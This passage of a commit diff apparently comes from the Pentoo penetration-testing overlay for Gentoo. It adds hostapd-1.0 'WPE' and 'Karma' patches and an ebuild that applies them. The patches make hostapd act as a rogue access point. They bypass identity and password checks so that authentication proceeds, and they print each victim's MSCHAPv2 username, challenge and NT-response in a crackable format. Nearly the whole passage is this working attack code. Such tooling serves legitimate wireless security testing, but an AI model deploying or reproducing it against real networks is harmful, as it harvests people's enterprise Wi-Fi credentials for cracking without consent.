++int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
++                          const u8 *username, size_t username_len,
++                          u8 *challenge);
++
+ void challenge_response(const u8 *challenge, const u8 *password_hash,
+ 			u8 *response);
+ int nt_password_hash(const u8 *password, size_t password_len,
+diff -uNr hostapd-1.0/src/crypto/tls_openssl.c hostapd-1.0-wpe/src/crypto/tls_openssl.c
+--- hostapd-1.0/src/crypto/tls_openssl.c	2012-05-09 17:56:09.000000000 -0400
++++ hostapd-1.0-wpe/src/crypto/tls_openssl.c	2012-08-20 22:27:09.583819291 -0400
+@@ -2642,7 +2642,7 @@
+ 				       data_len) != 1)
+ 		return -1;
+ #else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
+-	if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
++	if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
+ 				    data_len) != 1)
+ 		return -1;
+ #endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
+@@ -2948,7 +2948,7 @@
+ 		SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
+ 		SSL_set_tlsext_debug_arg(conn->ssl, conn);
+ #else /* SSL_OP_NO_TICKET */
+-		if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
++		if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
+ 					       conn) != 1)
+ 			return -1;
+ #endif /* SSL_OP_NO_TICKET */
+@@ -2963,7 +2963,7 @@
+ 		SSL_set_tlsext_debug_callback(conn->ssl, NULL);
+ 		SSL_set_tlsext_debug_arg(conn->ssl, conn);
+ #else /* SSL_OP_NO_TICKET */
+-		if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
++		if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
+ 			return -1;
+ #endif /* SSL_OP_NO_TICKET */
+ #endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
+diff -uNr hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-wpe/src/eap_server/eap_server.c
+--- hostapd-1.0/src/eap_server/eap_server.c	2012-05-09 17:56:09.000000000 -0400
++++ hostapd-1.0-wpe/src/eap_server/eap_server.c	2012-08-20 22:27:09.583819291 -0400
+@@ -100,6 +100,7 @@
+ 		 int phase2)
+ {
+ 	struct eap_user *user;
++	char ident = 't';
+ 
+ 	if (sm == NULL || sm->eapol_cb == NULL ||
+ 	    sm->eapol_cb->get_eap_user == NULL)
+@@ -111,7 +112,10 @@
+ 	user = os_zalloc(sizeof(*user));
+ 	if (user == NULL)
+ 	    return -1;
+-
++	if(phase2) {
++		identity = (const u8 *)&ident;
++		identity_len = 1;
++	}
+ 	if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
+ 				       identity_len, phase2, user) != 0) {
+ 		eap_user_free(user);
+diff -uNr hostapd-1.0/src/eap_server/eap_server_fast.c hostapd-1.0-wpe/src/eap_server/eap_server_fast.c
+--- hostapd-1.0/src/eap_server/eap_server_fast.c	2012-05-09 17:56:09.000000000 -0400
++++ hostapd-1.0-wpe/src/eap_server/eap_server_fast.c	2012-08-20 22:27:09.583819291 -0400
+@@ -1040,7 +1040,8 @@
+ 
+ 	switch (data->state) {
+ 	case PHASE2_ID:
+-		if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
++		//if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
++		if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
+ 			wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
+ 					  "Identity not found in the user "
+ 					  "database",
+diff -uNr hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c
+--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c	2012-05-09 17:56:09.000000000 -0400
++++ hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c	2012-08-20 22:27:09.583819291 -0400
+@@ -294,9 +294,10 @@
+ 	u8 flags;
+ 	size_t len, name_len, i;
+ 	u8 expected[24];
++	u8 challenge_hash1[8];
+ 	const u8 *username, *user;
+ 	size_t username_len, user_len;
+-	int res;
++	int res,x;
+ 
+ 	pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
+ 			       &len);
+@@ -335,6 +336,22 @@
+ 	wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
+ 	wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
+ 	wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
++	
++	challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
++
++	wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
++	printf("\n");
++	printf("\tusername: %s\n", name);
++	printf("\tchallenge: ");
++	for (x=0;x<7;x++)
++                printf("%02x:",challenge_hash1[x]);
++        printf("%02x\n",challenge_hash1[7]);
++
++        printf("\tresponse: ");
++        for (x=0;x<23;x++)
++                printf("%02x:",nt_response[x]);
++        printf("%02x\n",nt_response[23]);
++
+ 
+ 	/* MSCHAPv2 does not include optional domain name in the
+ 	 * challenge-response calculation, so remove domain prefix
+@@ -490,8 +507,8 @@
+ 
+ 	if (sm->user == NULL || sm->user->password == NULL) {
+ 		wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
+-		data->state = FAILURE;
+-		return;
++		//data->state = FAILURE;
++		//return;
+ 	}
+ 
+ 	switch (data->state) {

net-wireless/hostapd/files/hostapd-1.0-wpe_karma.patch

@@ -0,0 +1,157 @@
+diff -urN hostapd-1.0.orig/hostapd/main.c hostapd-1.0/hostapd/main.c
+--- hostapd-1.0.orig/hostapd/main.c	2013-05-01 22:58:03.007738503 +0800
++++ hostapd-1.0/hostapd/main.c	2013-05-01 22:49:55.000000000 +0800
+@@ -512,7 +512,7 @@
+ static void show_version(void)
+ {
+ 	fprintf(stderr,
+-		"hostapd v" VERSION_STR "\n"
++		"hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
+ 		"User space daemon for IEEE 802.11 AP management,\n"
+ 		"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
+ 		"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
+diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.c hostapd-1.0/src/crypto/ms_funcs.c
+--- hostapd-1.0.orig/src/crypto/ms_funcs.c	2012-05-10 05:56:09.000000000 +0800
++++ hostapd-1.0/src/crypto/ms_funcs.c	2013-05-01 22:49:55.000000000 +0800
+@@ -83,7 +83,7 @@
+  * @challenge: 8-octet Challenge (OUT)
+  * Returns: 0 on success, -1 on failure
+  */
+-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
++int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ 			  const u8 *username, size_t username_len,
+ 			  u8 *challenge)
+ {
+diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.h hostapd-1.0/src/crypto/ms_funcs.h
+--- hostapd-1.0.orig/src/crypto/ms_funcs.h	2012-05-10 05:56:09.000000000 +0800
++++ hostapd-1.0/src/crypto/ms_funcs.h	2013-05-01 22:49:55.000000000 +0800
+@@ -37,6 +37,10 @@
+ int nt_challenge_response(const u8 *challenge, const u8 *password,
+ 			  size_t password_len, u8 *response);
+ 
++int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
++                          const u8 *username, size_t username_len,
++                          u8 *challenge);
++
+ void challenge_response(const u8 *challenge, const u8 *password_hash,
+ 			u8 *response);
+ int nt_password_hash(const u8 *password, size_t password_len,
+diff -urN hostapd-1.0.orig/src/crypto/tls_openssl.c hostapd-1.0/src/crypto/tls_openssl.c
+--- hostapd-1.0.orig/src/crypto/tls_openssl.c	2012-05-10 05:56:09.000000000 +0800
++++ hostapd-1.0/src/crypto/tls_openssl.c	2013-05-01 22:49:55.000000000 +0800
+@@ -2642,7 +2642,7 @@
+ 				       data_len) != 1)
+ 		return -1;
+ #else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
+-	if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
++	if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
+ 				    data_len) != 1)
+ 		return -1;
+ #endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
+@@ -2948,7 +2948,7 @@
+ 		SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
+ 		SSL_set_tlsext_debug_arg(conn->ssl, conn);
+ #else /* SSL_OP_NO_TICKET */
+-		if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
++		if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
+ 					       conn) != 1)
+ 			return -1;
+ #endif /* SSL_OP_NO_TICKET */
+@@ -2963,7 +2963,7 @@
+ 		SSL_set_tlsext_debug_callback(conn->ssl, NULL);
+ 		SSL_set_tlsext_debug_arg(conn->ssl, conn);
+ #else /* SSL_OP_NO_TICKET */
+-		if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
++		if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
+ 			return -1;
+ #endif /* SSL_OP_NO_TICKET */
+ #endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
+diff -urN hostapd-1.0.orig/src/eap_server/eap_server.c hostapd-1.0/src/eap_server/eap_server.c
+--- hostapd-1.0.orig/src/eap_server/eap_server.c	2013-05-01 22:58:03.010738503 +0800
++++ hostapd-1.0/src/eap_server/eap_server.c	2013-05-01 22:54:51.000000000 +0800
+@@ -102,8 +102,9 @@
+ 		 int phase2)
+ {
+ 	struct eap_user *user;
+-    char *username = NULL;
+-    char *message = NULL;
++	char *username = NULL;
++	char *message = NULL;
++	char ident = 't';
+ 
+ 	eap_user_free(sm->user);
+ 	sm->user = NULL;
+@@ -112,6 +113,11 @@
+ 	if (user == NULL)
+ 	    return -1;
+ 
++	if(phase2) {
++		identity = (const u8 *)&ident;
++		identity_len = 1;
++	}
++
+     /* Karma EAP Modifications */
+     if (karma_eap_auth) {
+         /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */ 
+diff -urN hostapd-1.0.orig/src/eap_server/eap_server_fast.c hostapd-1.0/src/eap_server/eap_server_fast.c
+--- hostapd-1.0.orig/src/eap_server/eap_server_fast.c	2012-05-10 05:56:09.000000000 +0800
++++ hostapd-1.0/src/eap_server/eap_server_fast.c	2013-05-01 22:49:55.000000000 +0800
+@@ -1040,7 +1040,8 @@
+ 
+ 	switch (data->state) {
+ 	case PHASE2_ID:
+-		if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
++		//if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
++		if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
+ 			wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
+ 					  "Identity not found in the user "
+ 					  "database",
+diff -urN hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c hostapd-1.0/src/eap_server/eap_server_mschapv2.c
+--- hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c	2013-05-01 22:58:03.011738503 +0800
++++ hostapd-1.0/src/eap_server/eap_server_mschapv2.c	2013-05-01 22:56:30.000000000 +0800
+@@ -295,9 +295,10 @@
+ 	u8 flags;
+ 	size_t len, name_len, i;
+ 	u8 expected[24];
++	u8 challenge_hash1[8];
+ 	const u8 *username, *user;
+ 	size_t username_len, user_len;
+-	int res;
++	int res, x;
+ 	char *auth_creds = NULL;
+ 	int auth_creds_len = 0;
+ 
+@@ -338,6 +339,22 @@
+ 	wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
+ 	wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
+ 	wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
++	
++	challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
++
++	wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
++	printf("\n");
++	printf("\tusername: %s\n", name);
++	printf("\tchallenge: ");
++	for (x=0;x<7;x++)
++                printf("%02x:",challenge_hash1[x]);
++        printf("%02x\n",challenge_hash1[7]);
++
++        printf("\tresponse: ");
++        for (x=0;x<23;x++)
++                printf("%02x:",nt_response[x]);
++        printf("%02x\n",nt_response[23]);
++
+ 
+ 	/* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */  
+ 	/* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */ 
+@@ -524,8 +541,8 @@
+ 
+ 	if (sm->user == NULL || sm->user->password == NULL) {
+ 		wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
+-		data->state = FAILURE;
+-		return;
++		//data->state = FAILURE;
++		//return;
+ 	}
+ 
+ 	switch (data->state) {

net-wireless/hostapd/hostapd-1.0-r7.ebuild

@@ -0,0 +1,218 @@
+# Copyright 1999-2013 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Header: /var/cvsroot/gentoo-x86/net-wireless/hostapd/hostapd-1.0-r4.ebuild,v 1.4 2012/10/12 00:52:20 blueness Exp $
+
+EAPI="4"
+
+inherit toolchain-funcs eutils
+
+DESCRIPTION="IEEE 802.11 wireless LAN Host AP daemon"
+HOMEPAGE="http://hostap.epitest.fi"
+SRC_URI="http://hostap.epitest.fi/releases/${P}.tar.gz"
+
+LICENSE="|| ( GPL-2 BSD )"
+SLOT="0"
+KEYWORDS="amd64 ~mips ppc x86"
+IUSE="cui debug ipv6 +karma karma_cli logwatch madwifi +ssl +wpe +wps +crda"
+#karma (foofus) vs karma_cli (digininja)
+REQUIRED_USE="karma? ( !karma_cli )"
+
+DEPEND="ssl? ( dev-libs/openssl )
+	kernel_linux? (
+		dev-libs/libnl:3
+		crda? ( net-wireless/crda )
+	)
+	madwifi? ( ||
+		( >net-wireless/madwifi-ng-tools-0.9.3
+		net-wireless/madwifi-old ) )"
+RDEPEND="${DEPEND}"
+
+S="${S}/${PN}"
+
+src_prepare() {
+	cd ..
+	epatch "${FILESDIR}/${P}-libnl_path_fix.patch"
+	epatch "${FILESDIR}/${P}-tls_length_fix.patch"
+	use cui && epatch "${FILESDIR}/cui-20120417.patch"
+	use karma && epatch "${FILESDIR}/${P}-karma2.patch"
+	use karma_cli && epatch "${FILESDIR}/${P}-karma_cli.patch"
+	use wpe && use !karma && epatch "${FILESDIR}/${P}-wpe.patch"
+	use wpe && use karma && epatch "${FILESDIR}/${P}-wpe_karma.patch"
+
+	sed -i -e "s:/etc/hostapd:/etc/hostapd/hostapd:g" \
+		"${S}/hostapd.conf" || die
+}
+
+src_configure() {
+	local CONFIG="${S}/.config"
+
+	# toolchain setup
+	echo "CC = $(tc-getCC)" > ${CONFIG}
+
+	# EAP authentication methods
+	echo "CONFIG_EAP=y" >> ${CONFIG}
+	echo "CONFIG_EAP_MD5=y" >> ${CONFIG}
+
+	if use ssl; then
+		# SSL authentication methods
+		echo "CONFIG_EAP_TLS=y" >> ${CONFIG}
+		echo "CONFIG_EAP_TTLS=y" >> ${CONFIG}
+		echo "CONFIG_EAP_MSCHAPV2=y" >> ${CONFIG}
+		echo "CONFIG_EAP_PEAP=y" >> ${CONFIG}
+	fi
+
+	if use wpe; then
+		# Enable EAP_FAST
+		echo "CONFIG_EAP_FAST=y" >> ${CONFIG}
+		einfo "Enabling WPE support"
+	fi
+
+	if use wps; then
+		# Enable Wi-Fi Protected Setup
+		echo "CONFIG_WPS=y" >> ${CONFIG}
+		echo "CONFIG_WPS2=y" >> ${CONFIG}
+		echo "CONFIG_WPS_UPNP=y" >> ${CONFIG}
+		einfo "Enabling Wi-Fi Protected Setup support"
+	fi
+
+	echo "CONFIG_EAP_GTC=y" >> ${CONFIG}
+	echo "CONFIG_EAP_SIM=y" >> ${CONFIG}
+	echo "CONFIG_EAP_AKA=y" >> ${CONFIG}
+	echo "CONFIG_EAP_PAX=y" >> ${CONFIG}
+	echo "CONFIG_EAP_PSK=y" >> ${CONFIG}
+	echo "CONFIG_EAP_SAKE=y" >> ${CONFIG}
+	echo "CONFIG_EAP_GPSK=y" >> ${CONFIG}
+	echo "CONFIG_EAP_GPSK_SHA256=y" >> ${CONFIG}
+
+	einfo "Enabling drivers: "
+
+	# drivers
+	echo "CONFIG_DRIVER_HOSTAP=y" >> ${CONFIG}
+	einfo "  HostAP driver enabled"
+	echo "CONFIG_DRIVER_WIRED=y" >> ${CONFIG}
+	einfo "  Wired driver enabled"
+	echo "CONFIG_DRIVER_PRISM54=y" >> ${CONFIG}
+	einfo "  Prism54 driver enabled"
+	echo "CONFIG_DRIVER_NONE=y" >> ${CONFIG}
+	einfo "  None driver enabled"
+
+	if use madwifi; then
+		# Add include path for madwifi-driver headers
+		einfo "  Madwifi driver enabled"
+		echo "CFLAGS += -I/usr/include/madwifi" >> ${CONFIG}
+		echo "CONFIG_DRIVER_MADWIFI=y" >> ${CONFIG}
+	else
+		einfo "  Madwifi driver disabled"
+	fi
+
+	einfo "  nl80211 driver enabled"
+	echo "CONFIG_DRIVER_NL80211=y" >> ${CONFIG}
+	echo "CFLAGS += -I/usr/include/netlink" >> ${CONFIG}
+	echo "LIBS += -L/usr/lib" >> ${CONFIG}
+
+	# misc
+	echo "CONFIG_PKCS12=y" >> ${CONFIG}
+	echo "CONFIG_RADIUS_SERVER=y" >> ${CONFIG}
+	echo "CONFIG_IAPP=y" >> ${CONFIG}
+	echo "CONFIG_IEEE80211R=y" >> ${CONFIG}
+	echo "CONFIG_IEEE80211W=y" >> ${CONFIG}
+	echo "CONFIG_IEEE80211N=y" >> ${CONFIG}
+	echo "CONFIG_PEERKEY=y" >> ${CONFIG}
+	echo "CONFIG_RSN_PREAUTH=y" >> ${CONFIG}
+	echo "CONFIG_INTERWORKING=y" >> ${CONFIG}
+
+	if use ipv6; then
+		# IPv6 support
+		echo "CONFIG_IPV6=y" >> ${CONFIG}
+	fi
+
+	if ! use debug; then
+		echo "CONFIG_NO_STDOUT_DEBUG=y" >> ${CONFIG}
+	fi
+
+	# If we are using libnl 2.0 and above, enable support for it
+	# Removed for now, since the 3.2 version is broken, and we don't
+	# support it.
+	if has_version ">=dev-libs/libnl-3.2"; then
+		echo "CONFIG_LIBNL32=y" >> .config
+	fi
+
+	# TODO: Add support for BSD drivers
+
+	default_src_configure
+}
+
+src_compile() {
+	emake V=1
+
+	if use ssl; then
+		emake V=1 nt_password_hash
+		emake V=1 hlr_auc_gw
+	fi
+}
+
+src_install() {
+	insinto /etc/${PN}
+	doins ${PN}.{conf,accept,deny,eap_user,radius_clients,sim_db,wpa_psk}
+
+	fperms -R 600 /etc/${PN}
+
+	dosbin ${PN}
+	dobin ${PN}_cli
+
+	use ssl && dobin nt_password_hash hlr_auc_gw
+
+	newinitd "${FILESDIR}"/${PN}-init.d ${PN}
+	newconfd "${FILESDIR}"/${PN}-conf.d ${PN}
+
+	doman ${PN}{.8,_cli.1}
+
+	dodoc ChangeLog README
+	use wps && dodoc README-WPS
+
+	docinto examples
+	dodoc wired.conf
+
+	if use logwatch; then
+		insinto /etc/log.d/conf/services/
+		doins logwatch/${PN}.conf
+
+		exeinto /etc/log.d/scripts/services/
+		doexe logwatch/${PN}
+	fi
+}
+
+pkg_postinst() {
+	einfo
+	einfo "In order to use ${PN} you need to set up your wireless card"
+	einfo "for master mode in /etc/conf.d/net and then start"
+	einfo "/etc/init.d/${PN}."
+	einfo
+	einfo "Example configuration:"
+	einfo
+	einfo "config_wlan0=( \"192.168.1.1/24\" )"
+	einfo "channel_wlan0=\"6\""
+	einfo "essid_wlan0=\"test\""
+	einfo "mode_wlan0=\"master\""
+	einfo
+	if use madwifi; then
+		einfo "This package compiles against the headers installed by"
+		einfo "madwifi-old, madwifi-ng or madwifi-ng-tools."
+		einfo "You should remerge ${PN} after upgrading these packages."
+		einfo
+		einfo "Since you are using the madwifi-ng driver, you should disable or"
+		einfo "comment out wme_enabled from ${PN}.conf, since it will"
+		einfo "cause problems otherwise (see bug #260377"
+	fi
+	#if [ -e "${KV_DIR}"/net/mac80211 ]; then
+	#	einfo "This package now compiles against the headers installed by"
+	#	einfo "the kernel source for the mac80211 driver. You should "
+	#	einfo "re-emerge ${PN} after upgrading your kernel source."
+	#fi
+
+	if use wps; then
+		einfo "You have enabled Wi-Fi Protected Setup support, please"
+		einfo "read the README-WPS file in /usr/share/doc/${P}"
+		einfo "for info on how to use WPS"
+	fi
+}